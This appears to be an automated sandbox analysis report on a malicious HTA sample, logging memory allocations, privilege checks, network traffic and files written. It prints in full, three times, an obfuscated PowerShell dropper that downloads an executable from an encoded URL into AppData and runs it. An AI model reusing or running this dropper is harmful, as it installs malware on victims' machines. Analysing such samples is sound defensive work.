NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQy}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$MwnACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpHLjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDovBirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Path $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOpHLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270,77250,77258,77266,77258,77199,77270,77275,77200,77272,77264,77267,77253,77265,77267,77254,77268,77268,77200,77267,77264,77264,77262,77250,77199,77254,77273,77254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUGuLGImDnrHn;

cmdline

powershell.exe -ExecutionPolicy UnRestricted function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQy}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$MwnACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpHLjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDovBirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Path $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOpHLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270,77250,77258,77266,77258,77199,77270,77275,77200,77272,77264,77267,77253,77265,77267,77254,77268,77268,77200,77267,77264,77264,77262,77250,77199,77254,77273,77254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUGuLGImDnrHn;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 27, 2024, 8:44 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy, $cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQy}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$MwnACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpHLjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDovBirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk = $env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Path $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOpHLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270,77250,77258,77266,77258,77199,77270,77275,77200,77272,77264,77267,77253,77265,77267,77254,77268,77268,77200,77267,77264,77264,77262,77250,77199,77254,77273,77254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUGuLGImDnrHn; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 27, 2024, 8:44 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 27, 2024, 8:44 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (12 events)

Data received	]
Data received	Yõí{ß§^sVß0Ýÿ)JN¾»Ñ´A'n @°KÝ¤Vr®nÜhé¤s%#×¿öÎ,Ýrdþ¤\|Àÿ
Data received
Data received	ù0õ0Ý Óp£ö7Ø±ækh<0 H÷ 0210 UUS10U Let's Encrypt10 UR30 240422074105Z 240721074104Z010Uwww.eduaiqi.uz0"0 H÷ 0 ¤¼l³®®x±ràøöNOO4% äËö´Ðs>jp¸«ãKàîj4wÉ\|©¾ÝX{Ù?öo½{3ªÒ®1PÈ6Á(e$7Úz~ì}X]fÎÖh¤íÓªýHëoGzÒ2?B5u)8Û\|T·Þ¯iT(¾1Gbû0ÜQx3CÎÎ·h"óy>9xr ç#ò¹^þy{·¤]÷pHFÖÍï@$;lNíH·ÁW2²X&Gmý¾db^££äÃ]·ay$PM¼Ao^¨Sã- ÛË'>M;3òêÃÓë£00Uÿ 0U%0++0Uÿ00U'ú£ñÇSÒ DKÚ×ÿÙ0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0%U0 eduaiqi.uzwww.eduaiqi.uz0U 0 0g0 +ÖyõòðwH°ãkÚ¦G4åjú0ëRËVÝ,Ù»¿«9Øs÷I&H0F!À×£T´ñvd#ñ\N(äù6Mvý$ÛIîÅª4!º'ì?ö nGÌù ähAÓ=·§ßz0s©TuîÍÐdÕÛÎÅ\·´Í¢2F\|¼ìÞÃQHYFqµ÷IF0D KÙ¬Î[öEI@LPÓMm¬Ï½¹ÏÅÖÃuë© u5%0Û c T^¨°ËÌÓ@Ä¾f1·!rPén0 H÷ SïÞ RñµZ° ¡Ú~Qqo;Ôe£Ëap©³«Íõ¿»Á·×Ûgiò/²\|¿·J%4göxº°ççÄJ¼+Á+[_Q&Êµúdí¢h!æÿÒ»@tÜé)Y¢<ÂúgÛ¶QÛaPÒR® lê-%V±æS½Ð² ¼·i#dèÏâe=±»óã `´_NmÏû!ë%ËÉ?8ºÿ¼ÇÝ(ý ðúÈûþ@¶ vô¨¤ßÝ)/%Æ»~¨Nä4³üwcÐÚ³¦?<þH6ä·]=^cd`g00þ +JÏ§SöÖ.%§_Z0 H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4\|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH¡i®%u»ÌRõíQ¡Û£00Uÿ0U%0++0Uÿ0ÿ0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 H÷ ÊNG>£÷D¼Õgx²cuM=3erT- êÃíø ¿_Ì·p·n;ö^Þä ¦ï²ç¢µ<Î´í9ç\|%Gæen?FôÙðÎ+îTÎ¼'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'ÃÈ¹Î\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1uCØUrÄ)÷Ä]NÈ®F0×ò_¡y»ç^páÃ¹Üaq%*¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê\|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎUþéIdÔNÊ´[Às¨«¸GÂ
Data received	K
Data received	GA²³°+äM%^Ù0Q¢ÒÔ;Ìöùñ.îG7ââc>dÑ$·T¬®=éH¯ÖðVüp×3êõU5I¥ #Àc"KèÅë?üå AÔc#£@ÿ'hÔD0ï1fëgUÆ/ôôkvuM<z÷Jn/Î¿´0'®ÖqÍ©íîÈ èç»k,nÐ¾©{(&d¥x@¤ù¦ \|^ís.WÄË9Á`3;Þ 2½IQH£ú<É÷ÌÕ®9z±Õ¡Ã£'<"LsÚÙxìíµó¡tÉzhyËµ-y½ ö$¦¸U³m¯¢Néj ¹zGû_\|ÊY¹ãK4ÄkV%óË®ì?½gsØ´0×Íhéjë,¡/=ÜNHxc¯©
Data received
Data received
Data received
Data received
Data received	0
Data received	À®Õh+Pðj»áå 5ésóå8BrÁùaÊû¶fUºH½÷/õãé{Ì¤.Y°

Poweshell is sending data to a remote host (2 events)

Data sent	mifSÉI0z¯çÙ¶¶î 2r^,M¸1ÀÉQï%$RË/5 ÀÀÀ À 28(ÿ eduaiqi.uz
Data sent	FBAí©ªI6º³,`ÇG8¦Ò_Èâ§i\Óµ r#Týc^ÖPT/´ï¸ó#þ >ã :ßØDXÞÒßý°0+ËWø#:Jclë Ý-ñ@$QgMVñ&ªG¶Öþugª§6L ÎdÊ\,¨üÄ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 27, 2024, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

104.192.108.137

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send May 27, 2024, 8:44 a.m.	buffer: mifSÉI0z¯çÙ¶¶î 2r^,M¸1ÀÉQï%$RË/5 ÀÀÀ À 28(ÿ eduaiqi.uz socket: 1440 sent: 114	1	114
send May 27, 2024, 8:44 a.m.	buffer: FBAí©ªI6º³,`ÇG8¦Ò_Èâ§i\Óµ r#Týc^ÖPT/´ï¸ó#þ >ã :ßØDXÞÒßý°0+ËWø#:Jclë Ý-ñ@$QgMVñ&ªG¶Öþugª§6L ÎdÊ\,¨üÄ socket: 1440 sent: 134	1	134
WSASend May 27, 2024, 8:44 a.m.	buffer: GET / HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: x1.i.lencr.org socket: 2028		0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\rooma.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

room5.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All